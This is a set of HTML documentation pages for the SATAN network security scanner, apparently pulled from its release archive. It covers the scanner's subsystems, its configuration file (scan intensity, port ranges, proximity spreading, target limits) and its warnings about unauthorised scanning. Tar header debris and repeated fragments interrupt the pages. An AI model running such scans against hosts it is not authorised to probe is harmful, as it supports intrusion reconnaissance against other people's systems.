href="#scanning-levels">scanning level</a> is appropriate for that host. <p><dt><a href="#target-acquisition">Target acquisition</a>. <dd>Given a list of target hosts, this SATAN subsystem generates a list of probes to be run on those hosts. The list of probes serves as input to the <a href="#data-acquisition">data acquisition</a> subsystem. The target acquisition module also keeps track of a host's <a href="#proximity-levels">proximity level</a>, and handles the so-called <a href="#subnet-scan">subnet expansions</a>. <p><dt><a href="#data-acquisition">Data acquisition</a>. <dd>Given a list of probes, this SATAN subsystem runs the corresponding data collection tools and generates new facts. These facts serve as input to the <a href="#inference-engine">inference engine</a>. <p><dt><a href="#inference-engine">Inference engine</a>. <dd>Given a list of facts, this subsystem generates new target hosts, new probes, and new facts. New target hosts serve as input to the <a href="#target-acquisition"> target acquisition</a> subsystem; new probes are handled by the <a href="#data-acquisition">data acquisition</a> subsystem, and new facts are processed by the <a href="#inference-engine">inference engine</a>. <p><dt><a href="#report-analysis">Report and analysis</a>. <dd>This subsystem takes the collected data and builds a virtual hyperspace that you can explore with your favourite HTML browser. </dl> Once SATAN is given an initial target host, the target acquisition, data acquisition and inference engine subsystems keep feeding each other new data until nothing new comes up. Technically speaking, the system does a breadth-first search. <h3><a name="crypto-ignition">Magic cookie generator</a></h3> When you start SATAN in interactive mode, i.e., using the HTML user interface, SATAN performs the following actions before starting up the HTML browser: <ul> <p><li>Start the SATAN httpd daemon. This is a very limited subset of the typical httpd daemon, sufficient to support all activities that SATAN can perform. <p><li>Generate a (hopefully "good") 32 byte cryptographic magic cookie for the upcoming SATAN run. SATAN runs several system utilities in parallel and compresses their quasi-random output with the MD5 hashing function. The HTML browser must specify this magic cookie as part of the URLs that it sends to the custom SATAN httpd daemon. If this key is ever compromised, intruders could potentially execute any programs that the SATAN program can run, with the same privileges as the user that started the SATAN program. SATAN generates a new magic cookie for each session. SATAN and the HTML browser always run on the same host, so there is no need to send the magic cookie over the network. <p><li>Read in any previously collected scan data. By default, SATAN will read data in the <i>$satan_data</i> database. In the mean time HTML browser comes up, but it will not be ale to communicate with SATAN until the database has been read in. This can take anywhere from a few seconds to several minutes, depending on the size of the database, the speed of the machine you're using to run SATAN on, the amount of available RAM, etc. </ul> <h3><a name="policy-engine">Policy engine</a></h3> The policy engine controls what hosts SATAN may probe. The probing intensity depends on the host's <a href="#proximity-levels">proximity level</a>, which is basically a measure for the distance from the initial target host(s). Probing intensities and probing constraints are specified in the <a href="satan.cf.html">configuration file</a>. This file can direct SATAN to stay within certain internet domains, or to stay away from specific internet domains. <p> <h3><a name="proximity-levels"> Proximity levels </a></h3> <p> While SATAN gathers information from the so-called <i>primary</i> target(s) that you specified, the program may learn about the existence of other hosts. Examples of such <i>non-primary</i> systems are: <ul> <li>hosts found in remote login information from the <i>finger</i> service, <li>hosts that import file systems from the target, according to the <i>showmount</i> command. </ul> For each host, SATAN maintains a proximity count. The proximity of a primary host is zero; for hosts that SATAN finds while probing a primary host, the proximity is one, and so on. By default, SATAN stays away from hosts with non-zero proximity, but you can override this policy by editing the <a href="satan.cf.html">configuration file,</a> via command-line switches, or from the hypertext user interface. <h3><a name="target-acquisition">Target acquisition</a></h3> SATAN can gather data about just one host, or it can gather data about all hosts within a subnet (a block of 256 adjacent network addresses). The latter process is called a <a href="#subnet-scan">subnet scan </a>. Target hosts may be specified by the user, or may be generated by the <a href="#inference-engine">inference engine</a> when it processes facts that were generated by the <a href="#data-acquisition"> data acquisition</a> module. <p> Once a list of targets is available, the target acquisition module generates a list of probes, according to the <a href="#scanning-levels">scanning level</a> derived by the <a href="#policy-engine">policy engine</a>. The actual data collection is done under control of the <a href="#data-acquisition">data acquisition</a> module. <h3><a name="subnet-scan">Subnet scan</a></h3> When requested to scan all hosts in a subnet (a block of 256 internet addresses), SATAN uses the <i>fping</i> utility to find out what hosts in that subnet actually are available. This is to avoid wasting time talking to hosts that no longer exist or that happen to be down at the time of the measurement. The <i>fping</i> scan also may discover unregistered systems that have been attached to the network without permission from the network administrator. <h3><a name="data-acquisition">Data acquisition</a></h3> The data acquisition engine takes a list of probes and executes each probe, after it has verified that the probe may be run at the target's <a href="#scanning-levels">scanning level</a>. What tool may be run at a given scanning level is specified in the <a href="satan.cf.html">configuration file</a>. The software keeps a record of what probes it has already executed, to avoid doing unnecessary work. The result of data acquisition is a list of new facts that is processed by the <a href="#inference-engine">inference engine</a>. <p> SATAN comes with a multitude of little tools. Each tool implements one type of network probe. By convention, the name of a data collection tool ends in <i>.satan</i>. Often these tools are just a few lines of PERL or shell script language. All tools produce output according to the same common <a href="satan.db.html">tool record format.</a> SATAN derives a great deal of power from this toolbox approach. When a new network feature becomes of interest, it is relatively easy to <a href="satan.probes.html">add your own probe</a>. <h3><a name="scanning-levels">Scanning levels</a></h3> SATAN can probe hosts at various levels of intensity. The scanning level is controlled with the <a href="satan.cf.html">configuration file</a>, but can be overruled with command-line switches or via the graphical user interface. <dl> <p><dt>light <dd>This is the least intrusive scan. SATAN collects information from the DNS (Domain Name System), tries to establish what RPC (Remote Procedure Call) services the host offers, and what file systems it shares via the network. With this information, SATAN finds out the general character of a host (file server, diskless workstation). <p><dt>normal (includes <i>light</i> scan probes) <dd>At this level, SATAN probes for the presence of common network services such as finger, remote login, ftp, WWW, Gopher, email and a few others. With this information, SATAN establishes the operating system type and, where possible, the software release version. <p><dt>heavy (includes <i>normal</i> scan probes) <dd>After it has found out what services the target offers, SATAN looks at them in more depth, and does a more exhaustive scan for network services offered by the target. At this scanning level SATAN finds out if the anonymous FTP directory is writable, if the X Windows server has its access control disabled, if there is a wildcard in the <i> /etc/hosts.equiv </i>file, and so on. </dl> The fourth level, breaking into systems, has not been implemented. <p> At each level SATAN may discover that critical access controls are missing or defective, or that the host is running a particular software version that is known to have problems. SATAN takes a conservative approach and does not exploit the problem. <h3><a name="inference-engine">Inference engine</a></h3> The heart of SATAN is a collection of little inference engines. Each engine is controlled by its own rule base. The rules are applied in real time, while data is being collected. The result of these inferences are lists of new facts for the inference engine, new probes for the <a href="#data-acquisition">data acquisition engine</a>, or new targets for the <a href="#target-acquisition">target acquisition </a> engine. <dl> <p><dt><a href="satan.rules.html#todo">rules/todo</a> <dd>Rules that decide what probe to perform next. For example, when the target host offers the FTP service, and when the target is being scanned at a sufficient level, SATAN will attempt to determine if the host runs anonymous FTP, and if the FTP home directory is writable for anonymous users. <p><dt><a href="satan.rules.html#hosttype">rules/hosttype</a> <dd>Rules that deduce the system class (example: DEC HP SUN) and, where possible, the operating system release version, from telnet, ftp and other banners. <p><dt><a href="satan.rules.html#facts">rules/facts</a> <dd>Rules that deduce potential vulnerabilities. For example, several versions of the FTP or sendmail daemons are known to have problems. Daemon versions can be recognized by their greeting banners. <p><dt><a href="satan.rules.html#services">rules/services</a> <dd>Rules that translate cryptic daemon banners and/or network port numbers to more user-friendly names such as <i>WWW server,</i> or <i>diskless NFS client</i>. <p><dt><a href="satan.rules.html#trust">rules/trust</a> <dd>Like the services rules, these rules help SATAN to classify the data that was collected by the tools on NFS service, DNS, NIS, and other cases of trust. <p><dt><a href="satan.rules.html#drop">rules/drop</a> <dd>What data-collection tool output SATAN should ignore. This can be used to shut up SATAN about things that you do not care about. Implemented by the <i>drop_fact.pl</i> module. </dl> Application of these rules in real time, to each tool output record, and within the context of all information that has been collected sofar, offers an amazing potential that we are only beginning to understand. <h3><a name="report-analysis">Report and Analysis</a></h3> When SATAN scans a network with hundreds or thousands of hosts, it can collect a tremendous amount of information. As we have found, it does not make much sense to simply present all that information as huge tables. You need the power of hypertext technology, combined with some unusual implementation techniques to generate a dynamic hyperspace on the fly. <p> With a minimal amount of effort (at least, by you; your computer may disagree), SATAN allows you to navigate though your networks. You can break down the information according to: <ul> <li>Domain or subnet, <li>Network service, <li>System type or operating system release, <li>Trust relationships, <li>Vulnerability type, danger level, or count. </ul> Breakdowns by combinations of these properties are also possible. SATAN's reporting capabilities makes it relatively easy to find out, for example: <ul> <li>What subnets have diskless workstations, <li>What hosts offer anonymous FTP, <li>Who runs Linux or FreeBSD on their PC, <li>What unregistered (no DNS hostname) hosts are attached to your network. </ul> <p> Questions like these can be answered with only a few mouse clicks. Printing a report is a matter of pressing the <i>print</i> button of your favourite hypertext viewer. <hr> <a href="satan_reference.html"> Back to the Reference TOC/Index</a> </BODY> </HTML> itable, if the X Windows server has its access control disabled, if there is a wildcard in the <i> /etc/hosts.equiv </i>file, and so onsatan-1.1.1/html/docs/who_should_use.html........................................................... 600 . 465 . 506 . 641 5736744275 13506. ................................................................. ................................................................................................................................................................................................................................................................. ..................................<HTML> <HEAD> <title>Who should use SATAN?</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H2>Who should use SATAN?</H2> <HR> <p> SATAN's primary design goal was to be an information gathering and sorting tool. System administrators will probably get the most out of using it, but it might prove useful for anyone who wants to learn and understand more about network security. </BODY> </HTML> rules, these rules help SATAN to classify the data that was collected by the tools on NFS servisatan-1.1.1/html/docs/satan.cf.html................................................................. 600 . 465 . 506 . 24762 5741743422 12213. .................................................... ................................................................................................................................................................................................................................................................. ...............................................<HTML> <HEAD> <title>SATAN Configuration File</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">The SATAN configuration file</H1> <HR> <p> <OL> <li> <A HREF="#attack-level"> Attack Level</A> <li> <A HREF="#correspond"> Which Probes Correspond to the Attack Level</A> <li> <A HREF="#status-file"> The What's and Where's of the Current Probe</A> <li> <A HREF="#timeouts"> Timeouts</A> <li> <A HREF="#timeout-signals"> Timeout Signals</A> <li> <A HREF="#prox-vars"> Proximity Variables</A> - <STRONG>IMPORTANT</STRONG> <li> <A HREF="#trust"> Trusted or Untrusted</A> <li> <A HREF="#exceptions"> Targeting Exceptions</A> <li> <A HREF="#workarounds"> Workarounds: DNS, ICMP </A> </OL> <HR> The SATAN configuration file (<I>config/satan.cf</I>) is <STRONG><I>VERY</I></STRONG> important! Almost everything SATAN does when scanning hosts and networks is controlled through this file; how hard to probe the targets, how far the probes will spread from the original host, what tests will be run, etc. While a limited number of configuration options can be controlled via the HTML user interface, the very low-level variables must be configured by manually editing this file. <p> This file is nothing more than perl code that gets run when the program initializes; don't be intimidated by that, however - it is fairly easy to read and is heavily commented (if you don't know perl, comments (lines that don't do anything) are lines that start with a sharp/pound sign ("#")). Variables are tokens that start with a dollar sign; values of 0 or null ("") typically mean false, unless otherwise noted. <p> The easiest way to explain all of the options is by simply going over each line in the file and explain what it does: <p> <A NAME="attack-level"> <H3>Attack Level</H3> </A> <PRE> # Default attack level (0=light, 1=normal, 2=heavy) $attack_level = 0; </PRE> This sets the attack level, which in turn tells SATAN which probes to use (<A HREF="#attack-level"> see below</A>) against a target host. <p> <A NAME="correspond"> <H3>Which Probes Correspond to the Attack Level</H3></A> This section is a bit tricky; the 3 types of probes (light, normal, heavy) each have a set of programs that they use when probing a remote system. As with any of the other variables in the program used, these can be changed as desired. the programs that are <p> However, there is one twist; not all probes are run, even though they might be listed under an attack level. If a SATAN probe has a question mark ("?") appended to its name, it will run conditionally. What does this mean? Take, for instance, the NFS SATAN checker. There is no reason to run it if the remote system isn't running NFS (indeed, you shouldn't run it, because the program will waste time timing out on the remote host), so SATAN will only run this if it determines that NFS is being run. <p> So, examining the first few lines in this section reveals: <PRE> # Probes by attack level. # # ? Means conditional, controlled by rules.todo. * Matches anything. @light = ( 'dns.satan', 'rpc.satan', 'showmount.satan?', ); </PRE> <p> This means that a light scan will run the <I>dns.satan</I> and the <I>rpc.satan</I> scans, and the <I>showmount.satan</I> if SATAN determines that the target is running NFS. <p> A bit further down shows: <PRE> @normal = ( @light, 'finger.satan', 'tcpscan.satan 70,80,ftp,telnet,smtp,nntp,uucp', 'udpscan.satan 53,177', 'rusers.satan?', 'boot.satan?', ); @heavy = ( @normal, $heavy_tcp_scan = 'tcpscan.satan 1-9999', $heavy_udp_scan = 'udpscan.satan 1-2050,32767-33500', '*?', ); </PRE> Nothing unusual here, except for the tcp and udp scan numbers; these refer to the port numbers that SATAN examines for signs of activity. <A NAME="status-file"> <H3>Status File</H3></A> SATAN keeps track of what the latest attack is in a file. This filename is stored in <I>$status_file</I> and is updated before each new probe runs: <PRE> # status file; keeps track of what probe is currently running and at what time it started $status_file = "status_file"; </PRE> <A NAME="timeouts"> <H3>Timeouts</H3></A> Certain network probes will "hang", or continue to try to contact the remote host for a <STRONG>very</STRONG> long time. To prevent this from slowing down the overall scan, there are three timeout values (in seconds) that SATAN recognizes: <PRE> # timeout values $slow_timeout = 60; $med_timeout = 20; $fast_timeout = 10; </PRE> By default, all SATAN probes are launched with the same timeout value, which can be set from the command line or from the HTML interface. SATAN defaults to a medium timeout value. <p> Some tools need more time, such as the nfs checker, or the port scanner when many ports are to be scanned. For this reason you override the default timeout for specific tools. Examples: <pre> %timeouts = ( 'nfs-chk', $slow_timeout, $heavy_tcp_scan, $slow_timeout, ); </pre> <p> <A NAME="timeout-signals"> <H3>Timeout Signals</H3></A> When a timeout occurs, a signal is sent to the process running to stop it. This defaults to "9", which basically means that the process is toast: <PRE> # what signal we send to nuke things when they timeout: $timeout_kill = 9; </PRE> <A NAME="prox-vars"> <H3>Proximity Variables</H3></A> This is probably the most critical variable in the entire SATAN program. Under <STRONG>NO</STRONG> circumstances do you want to set this to anything over "3" unless you know <STRONG>EXACTLY</STRONG> what you're doing! Anything over "0" can affect sites other than your own. <p> Proximity refers to how close the current target is from the original target of the SATAN probe. For instance, if you probe <I>victim.com</I> and find that <I>nic.ddn.mil</I> is its nameserver, then <I>nic.ddn.mil</I>'s proximity level would be "1", and SATAN might probe that host next, depending on the rules you choose. <p> The number of hosts SATAN scans can grow exponentially, so again, be careful! <PRE> # # Proximity variables; how far out do we attack, does severity go down, etc. # # how far out from the original target do we attack? $max_proximity_level = 0; </PRE> SATAN defaults to 0, which means that it will only scan the primary targets selected. <p> As SATAN gets farther away from the primary target, the attacks will get weaker - this presumes that you can attack your own sites as much as desired, but since you might not know where SATAN will end up, you'd like to be cautious the farther away the probes are going from your own host. <PRE> # Attack level drops by this much each proximity level change $proximity_descent = 1; </PRE> This value is subtracted from the current <A HREF="#attack-level">attack level</A> - a value of zero means that attacks do not diminish in strength. <p> If the attack level goes below zero, do you stop or go on? The "$sub_zero_proximity" variable determines this: <PRE> # when we go below zero attack severity, do we stop (0) or go on (1)? $sub_zero_proximity = 0; </PRE> SATAN will, by default, examine only one target at a time. If the "$attack_proximate_subnets" variable is set to "1", then <STRONG>ALL</STRONG> targets on the secondary target's subnet will be scanned. Be <STRONG>VERY</STRONG> careful when changing this!a <PRE> # a question; do we attack subnets when we nuke a target? # 0 = no; 1 = primary target subnet $attack_proximate_subnets = 0; </PRE> <A NAME="trust"> <H3>Trusted or Untrusted</H3> By default, SATAN assumes that it is being run from "inside". This means that the probing host may appear in other hosts <i>rhosts, hosts.equiv</i> or <i>NFS export</i> files. <PRE> # # Does SATAN run on an untrusted host? (0=no; 1=yes, this host may appear # in the rhosts, hosts.equiv or NFS export files of hosts that are being # probed). # $untrusted_host = 0; </PRE> <A NAME="exceptions"> <H3>Targeting Exceptions</H3></A> Without precautions, SATAN can probe sites that you might not want it to. Exceptions are a way to prevent SATAN from going astray. There are two ways of setting this up, and each is controlled by a variable name. The <I>$only_attack_these</I> variable is a list of domains and/or networks that tells SATAN to only attack hosts that match one of those patterns. For example, if you wanted SATAN to only attack educational sites, you could say: <PRE> $only_attack_these = "edu"; </PRE> Similarly, there is a variable, <I>$dont_attack_these</I>, which you can set to a list of domains and/or networks that SATAN should <STRONG><I>never</I></STRONG> attack. Looking at the last part of the configuration file gives further examples of this: <PRE> # # If $only_attack_these is non-null, *only* hit sites if they are of this # type. You can specify a domain (podunk.edu) or network number # (192.9.9). You can specify any combination of domains and or networks # as long as you separate them by whitespace and/or commas. # # Examples: # # $only_attack_these = "podunk.edu"; # $only_attack_these = "192.9.9"; # $only_attack_these = "podunk.edu, 192.9.9"; # $only_attack_these = ""; # # Stay away from anyone that matches these patterns. # # Example - leave government and military sites alone: # # $dont_attack_these = "gov, mil"; $dont_attack_these = ""; </PRE> <A NAME="workarounds"> <H3>Workarounds: DNS, ICMP</H3></A> <h4>DNS</h4> SATAN wants to use fully-qualified host names (<i>host.domain</i>) so that it can fix truncated hostnames, as found, for example, in <i>finger</i> output. The <code>$dont_use_nslookup</code> flag controls whether SATAN should use the <i>nslookup</i> command to look up hostnames. <pre> # Set to nonzero if nslookup does not work. $dont_use_nslookup = 0; </pre> <h4>ICMP</H4> Before probing a host, SATAN attempts to ping it. When the host does not respond, SATAN assumes the host is down and skips further probes. The <code>$dont_use_ping</code> controls whether SATAN should ping hosts before probing them. Set it to a non-zero value when ICMP does not work. <pre> # Set to nonzero if ICMP does not work. $dont_use_ping = 0; </pre> <HR> Of course, reading the perl code in the various modules can give more hints on all of these configuration file options. <hr> <a href="satan_reference.html"> Back to the Reference TOC/Index</a> </BODY> </HTML> is presumes thsatan-1.1.1/html/docs/artwork.html.................................................................. 600 . 465 . 506 . 1101 5736744274 12157. ....................................................................................... ................................................................................................................................................................................................................................................................. ............<HTML> <HEAD> <title>SATAN Artwork</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H2><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">SATAN Artwork</H2> <HR> Neil Gaiman (author of the extraordinary comic book <CITE><STRONG>Sandman</STRONG></CITE>) was ever so kind enough to donate a custom image for the SATAN project. We're <STRONG>very</STRONG> grateful to him for putting the perfect, final touch on our system. <HR> <a href="../images/satan-full.gif"> <IMG SRC="../images/satan-almost-full.gif" ALT="[SECOND SATAN IMAGE]"> </a> </BODY> </HTML> <I>$dont_attack_these</I>, which you can set to a list of domains and/or networks that SATAN should <STRONG><I>never</I></STRONG> attack. Looking at the last part of the configuration file gives further examples of this: <PRE> # # If $only_attack_these is non-null, *only* hit sites if they are of this # type. You can specify a domain (podunk.edu) or network number # (192.9.9). You can specify any combination of domains and satan-1.1.1/html/docs/dangers.html.................................................................. 600 . 465 . 506 . 13762 5737562740 12146. ..................................... ................................................................................................................................................................................................................................................................. ..............................................................<HTML> <HEAD> <title>Dangers of SATAN</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Dangers of SATAN</H1> <HR> How could a friendly program such as SATAN be called dangerous? Well, there are two reasons; first, system crackers, potential intruders, or simply random people on the Internet could run the program against hosts that they have no authorization to do so against. This could be a problem especially since some of the probes that SATAN uses are very similar to some attack methods used by system crackers (and that's part of the reason that it works so well), and alarms and blood pressures could be raised unnecessarily. The second reason is that even a well-intentioned system administrator could run SATAN on her or his system and it could follow lines of trust or potential vulnerability far beyond their authorized e-borders and anger or frustrate their neighbors. The safest way to run SATAN is behind a firewall - since SATAN will only probe systems that it has IP connectivity to, it will never cross the firewall host (assuming IP_FORWARDING is turned off.) Be <STRONG>VERY</STRONG> careful if you're running SATAN behind a firewall that allows inside users to have direct IP connectivity to hosts on the Internet! You are essentially on the Internet as far as SATAN is concerned, so follow the above guidelines. <p> The dangers of <I>writing</I> SATAN are tangible as well. One of the authors lost his job because of it; there has been a letter writing campaign to stop the release of the program. People accuse us of writing it for noterieties sake and pure personal gain. And the newspaper reports of the mission of the program have not been, as they say, wholly favorable. <p> <A NAME="leashing-satan"><H3>Controlling SATAN</H3></A> SATAN has three main safeguards built into the program. First, it will never venture further than the <I>proximity level</I> number of hosts away from the original target or subnet. Each host or ring of hosts that is/are adjacent to the original target is one proximity level further away. So if the proximity level is set to two, SATAN will never attack more than two hops away from the original target. This can still be a very sizable number of hosts, because it can progress exponentially! See the <A HREF="satan.cf.html#prox-vars">config/satan.cf</A> documentation for more on this topic. In addition to proximity levels, it has two other methods to restrict SATAN's wanderings - the two targeting exception variables <I>"$only_attack_these"</I> and <I>"$dont_attack_these"</I>. The first can limit SATAN to probe only hosts in a specified set of hosts, governed by their FQDN (such as <I>"berkeley.edu"</I>, <I>"sun.com"</I>, or whatever), and the second can inform SATAN that it shouldn't probe any hosts of a specific name - for instance, all military (<I>".mil"</I>) or government (<I>".gov"</I>) sites. See the <A HREF="satan.cf.html#exceptions">config/satan.cf</A> documentation for more on this topic. <p> <A NAME="boundary"><H3>Boundary issues - keeping track of where it is</H3></A> When SATAN probes hosts, it updates a status file (called <i>status_file</i> by default) with a time stamp and with the last executed action. Setting the verbose/debug flag (the "-v" option) will output the current host on the command line, but with quite a bit of other output as well, and it can be difficult to keep track of things. <p> <A NAME="being-friendly"><H3>Being a very unfriendly neighbor</H3></A> It is generally considered to be very rude and anti-social behavior to scan someone else's hosts or networks without the explicit permission of the owner. <STRONG>Always</STRONG> ask if it'd be ok to scan outside of your own networks. If you're unsure about where SATAN will go, set the <A HREF="satan.cf.html#prox-vars">proximity levels</A> to be very low (start at zero!) and set the <A HREF="satan.cf.html#exceptions"> $only_attack_these</A> variable to disallow SATAN from scanning anything but your own hosts. <p> Please be considerate <I>and</I> smart; unauthorized scanning of your Internet neighbors, even if you think you're doing them a favor, can be seen as a serious transgression on your part, and could engender not only ill will or bad feelings, but legal problems as well. <p> <A NAME="attack-or-not"><H3>Attacking vs. probing vs. scanning</H3></A> What is an attack, or a probe, or a scan? It's not always clear, especially as system administrators are getting more savy and aware of the enormous amount of traffic present on the Internet (see Steve Bellovin's <A HREF="ftp://research.att.com/dist/smb/packets.ps"> paper</A> on this topic for more information about this). For instance, is a finger from a remote site an attack? Without knowing any of the motivations involved, it can't be ascertained. "Finger wars", or two sites that use the <I>"tcp wrappers"</I> or similar software that will automatically finger a remote site that connects to it can bring down hosts inadvertently. <p> Certainly SATAN could be used to attack systems, but just as certainly, it wasn't designed for that. In the documentation we use scanning and probing fairly interchangeably, and as long as SATAN is used properly, that's all it will ever do. Be aware that many of the probes will generate messages on the console or set off various alarms on the remote target, however, so you should be aware of the potential for false alarms and accusations that might be leveled against you. <p> <A NAME="legal"><H3>Legal problems with running SATAN</H3></A> Not only is it an unfriendly idea to run SATAN against a remote site without permission, it is probably illegal as well. Do yourself and the rest of the Internet a favor and don't do it! While we don't know of anyone being charged with a crime or sued because they ran a security tool against someone else, SATAN could change that. Heed the warnings, limit your scans to authorized hosts, and all should be well. <hr> <a href="satan_overview.html"> Back to the Introductory TOC/Index</a> </BODY> </HTML> rgeting exceptsatan-1.1.1/html/docs/FAQ.html...................................................................... 600 . 465 . 506 . 45761 5742435366 11135. ....................................................................................... ................................................................................................................................................................................................................................................................. ............<HTML> <HEAD> <title>SATAN Frequently Asked Questions (FAQ)</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">SATAN Frequently Asked Questions (FAQ)</H1> <HR> <H3>Table of Contents</H3> (Last-modified: April 10th, 1995) <ul> <li> <a href="#general"> General Questions <li> <a href="#trouble"> Troubleshooting <li> <a href="#compare"> Comparisons, Hype, etc. <li> <a href="#tech"> Tech Stuff <li> <a href="#vital"> Really Important Things </ul> <hr> <a name="general"></a> <H3>General questions</H3> <UL> <li> <A HREF="intro.html#what-is-satan">What is SATAN?</A> <li> <a href="../name.html">Why is it called SATAN?</a> <li> <a href="philosophy.html">Why in the hell (ahem) was it written?</a> <li> <a href="system_requirements.html">What does it run on?</a> <li> <a href="system_requirements.html#other-requirements">How do you get it?</a> <li> <a href="copyright.html">Is it freeware, Public Domain, Copyrighted...?</a> <li> <a href="artwork.html">Who did the cool artwork?</a> <li> <a href="philosophy.html#money">Who paid for the development?</a> <li> <a href="philosophy.html#money">Does any company, government, or organization endorse it?</a> <li> <a href="philosophy.html#white-hats">Why don't you release it just to the white hats (what about the system crackers)?</a> </UL> <a name="trouble"></a> <H3>Troubleshooting</H3> <h4>(Getting it to work/run at all)</h4> <UL> <li><a href="#linux">I'm trying to get SATAN running on my Linux box. Why won't it work?</a> <li><a href="#ultrix">I'm trying to get SATAN to compile on my ULTRIX box. Why won't it work/where is rpgen?</a> <li><a href="#compress">What do I need to uncompress the SATAN tar file?</a> <li><a href="#get-perl">Where do I get a version of perl that will work?</a> <li><a href="#upgrade">When I try to run SATAN, it says (something like): "missing right bracket at perl/getfqdn.pl line 48, at end of line"</a> <li><a href="#ctime">When I try to run SATAN, it says (something like): "Can't locate ctime.pl in @INC at perl/status.pl line 5."</a> <li><a href="#x-stuff">When I try to run satan I get "Xlib:connection to ":0.0" refused by server"</a> </ul> <h4>(Problems when running it)</h4> <ul> <li><a href="#bogus">SATAN doesn't find any hosts at all - it starts and stops with "(0 host(s) visited)". This is bogus! Give me my money back!</a> <li><a href="#crash">SATAN crashed, hung, or did very odd things to a system that it was run against.</a> <li><a href="FAQ.html#black-n-white">I'm using a B/W monitor, and it's hard to see the difference between red and black dots. What can I do?</a> <li><a href="FAQ.html#www">How can I change from one HTML browser (e.g. Mosaic, Netscape, whatever) to another, without running reconfig or something?</a> <li><a href="FAQ.html#multi-fingers">Why does SATAN keep fingering the same host(s) over and over again?</a> <li><a href="#crash-n-burn">I ran SATAN to analyze my results and the machine slows grinds down to a standstill (and possibly crashes), but I don't get any answers.</a> <li><a href="#broken-dns">Given that Satan starts its own http server on the local host, why doesn't it use 'localhost' instead of the FQDN of the local host when trying to contact it?</a> <li><a href="#proxy">Whenever I click on a hyper link it doesn't work.</a> <li><a href="#merge">I merged some databases together with the "merge" function in the <i>SATAN Data Management</i>, but when I exited SATAN, they weren't saved. What gives?</a> <li><a href="#processes">I get "bin/tcp_scan: socket: Too many open files" in the window from which I start Satan.</a> </UL> <a name="compare"></a> <H3>Comparisons, Hype, etc.</H3> <UL> <li> <a href="#the-big-deal">What's the deal? Who cares? Why all the publicity?</a> <li> <a href="#satan-n-cops">What's the difference between it and COPS?</a> <li> <a href="#satan-n-iss">What's the difference between it and ISS and other remote scanners?</a> <li> <a href="#remote-audit">What's a remote security auditing tool/probe/scanner?</a> </UL> <a name="tech"></a> <H3>Tech stuff</H3> <UL> <li> <a href="#black-n-white">I'm using a B/W monitor, and it's hard to see the difference between red and black dots. What can I do?</a> <li> <a href="#www">How can I change from one HTML browser (e.g. Mosaic, Netscape, whatever) to another, without running reconfig or something?</a> <li> <a href="philosophy.html#why-scan">Why does it scan sites outside of your own domain?</a> <li> <a href="#warning-sites">Why doesn't it warn remote hosts that it is probing them?</a> <li> <A HREF="satan.probes.html">What is a .satan file, and how can I write my own?</A> <li> <A HREF="satan.rules.html">How can I write my own rules to teach SATAN about my site?</A> <li> <A HREF="satan.rules.html#drop">How can I teach SATAN to ignore .what it thinks is a vulnerability?</A> <li> <a href="#multi-fingers">Why does SATAN keep fingering the same host(s) over and over again?</a> <li> <a href="#died">SATAN died (or the machine crashed, or whatever) in the middle of a run - do I have to start everything over again?</a> <li> <a href="#how-detect">How can I tell if anyone is running SATAN against me?</a> <li> <a href="#different-os">{When is the port of/can you help me port/do you have any information on porting} SATAN to MacOS/DOS/VMS/MVS/Whatever?</a> <li> <a href="#tmp-files">I see a lot of odd files that are appearing on my system after running SATAN, such as /tmp/sh11318, tmp_file.1288, etc. What's the deal?</a> <li> <a href="#bug-check">Why doesn't SATAN check for [insert your favorite bug here]?</a> </UL> <a name="vital"></a> <H3>Really important things</H3> <UL> <li> <a href="#authors">How can I contact the authors?</a> <li> <a href="acknowledgements.html">Acknowledgements.</a> </UL> <hr> <a name="authors"><H3>How can I contact the authors?</H3></a> Send mail to <A HREF="mailto:satan@fish.com">satan@fish.com</A> (or click on the e-mail address); this will be sent to both of the authors. Failing this, you can send mail directly to Dan: <A HREF="mailto:zen@fish.com">zen@fish.com</A> or Wietse: <A HREF="mailto:wietse@wzv.win.tue.nl">wietse@wzv.win.tue.nl</A> <a name="the-big-deal"><H3>What's the deal? Who cares? Why all the publicity?</H3></a> SATAN appears to be a tool written at the right time. The current (as of April, 1995) flurry of concern and press about SATAN is not really all about SATAN - anything that is Internet related is big news these days. Combine that with the recent Mitnick/Shimomura hunt and capture, as well as the latest IP spoofing techniques being publicized, and you have, for whatever reason, a big story in SATAN. <p> There are some technical reasons why SATAN is important - it <STRONG>does</STRONG> do and detect things that weren't possible before, at least by no other tools or methods that the authors knew about. It's easy to use, and fills a gap that was only poorly covered by previous software. However, the death of the Internet is not, and should not be predicted. <p> <a name="upgrade"><h3>When I try to run SATAN, it says (something like): "missing right bracket at perl/getfqdn.pl line 48, at end of line"</h3></a> You need to upgrade your version of perl - you're probably using the alpha version of perl5. <p> <a name="compress"><h3>What do I need to uncompress the SATAN tar file?</h3></a> To uncompress the archives, you'll need to use the Un*x uncompress program if it ends in ".Z", or the GNU unzip if it ends in ".gz". <p> <a name="get-perl"><h3>Where do I get a version of perl that will work?</h3></a> perl5 is available via anonymous ftp from ftp.netlabs.com <p> <a name="ctime"><h3>When I try to run SATAN, it says (something like): "Can't locate ctime.pl in @INC at perl/status.pl line 5."</h3></a> ctime.pl is bundled with perl5; if you've installed that, you should have it - look for it in the library subdirectories. If it's there, as a last resort you can copy "ctime.pl" (and perhaps "getopts.pl" into the main SATAN directory, and SATAN should find it there. <p> <a name="x-stuff"><h3>When I try to run satan I get "Xlib:connection to ":0.0" refused by server"</h3></a> You can do a "xhost +hostname", where "hostname" is the host you're running it on, and try again. Also, look at <a href="../tutorials/vulnerability/SATAN_password_disclosure.html"> the problems with X, networks, and SATAN</a> <p> <a name="ultrix"><h3>I'm trying to get SATAN to compile on my ULTRIX box. Why won't it work/where is rpgen?</h3></a> DEC/Ultrix doesn't have "rpcgen". You'll need to run it on another machine and drag the resulting source code over (or upgrade to SATAN version 1.1 or better.) <p> <a name="bogus"><h3>SATAN doesn't find any hosts at all - it starts and stops with "(0 host(s) visited)". This is 